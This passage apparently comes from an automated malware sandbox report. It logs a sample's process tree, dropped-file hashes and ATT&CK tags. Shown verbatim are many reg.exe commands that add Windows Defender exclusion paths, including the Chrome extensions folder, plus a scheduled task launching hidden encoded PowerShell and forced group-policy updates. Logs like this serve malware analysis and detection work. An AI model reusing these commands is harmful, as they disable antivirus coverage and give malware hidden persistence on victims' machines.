PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:324⤵PID:2264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:644⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:324⤵PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:644⤵PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:324⤵PID:2992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:644⤵PID:976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:324⤵PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:644⤵PID:912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:324⤵PID:2800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:644⤵PID:532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:324⤵PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:644⤵PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:324⤵PID:2972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:644⤵PID:836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:324⤵PID:1628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:644⤵PID:1488
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghvOphcQH" /SC once /ST 10:40:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghvOphcQH"3⤵PID:2564
-
-
-
C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exeC:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe Fi /nTsite_idiTD 385118 /S2⤵
- Executes dropped EXE
PID:2204
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {DB64E25A-720D-4AE0-9237-1EC01284555D} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1724
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2064
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:700
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2956
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1520
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2856
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58b144f11a703b9e766160e3bafbbc607
SHA1dc876639ea0ef392d2fab5eb37b479b3fdaee69b
SHA2566d3fd8c7abc601a51dd7388bc9ce08a537ee1a3ded2cb7bf2e8629411243c257
SHA5125eb369ab05061f60a451761682a9019b1c2679d301644eca117a0c7a6ed8a6885ebb5c56b9eb58a478b076b1c0da8b48ff891a31f6f3d4102d7e19b5a8f2e31e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SBPNCSW8ZEUXHX7HD8U6.temp
Filesize7KB
MD5f7b92e0e114a027ae162589e196f8844
SHA17fadcb83884257a2026239cd17141a811eb50aed
SHA256818e9d082dc23539aa3e4013f093907e01d87d04227269e318901a9a0a9088d0
SHA512dee9843c71948618156772e54b8f146991e6431ed6becb7c61e0295e01daacec7dbcaa60177d651748b72fc589285aeb405598fe094c66e3b2605b1ab1ce8000
-
Filesize
9KB
MD544f92e47f7bbac6796287e09f4a58d27
SHA1036350d24e0b64a0977c22d3367f79c18d86eeed
SHA256d43581eea4cac88f4cfc4e5a1634f96984e5cb9e43c7e9fbc56a96b5caa3eb84
SHA512558b66bbcaaa71e444654bd5d26c51854d5b4c3d6ee937b64db9b72d80754e2d75194f67ffd213a28be5602a816f2fb4ae620547e8af7b0601e36e83659e2ebf
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
6.7MB
MD50a35bbd6448122353a2d8ea91cff5781
SHA1742ec335853eba4e5b41200fa46958328e90cb2f
SHA256ccc5f37eb38a137f33f8f0d603f88f178056a9c576c316f6a366727e07c9a0bb
SHA5125c4dbc03b3c43ddea27bb6df56e5e317c64237018e325a84b257847e4223f0c3302f10b9ab5956ef7e197c237f7d346fbddbb7ee06856b42314cc0b85f300b8f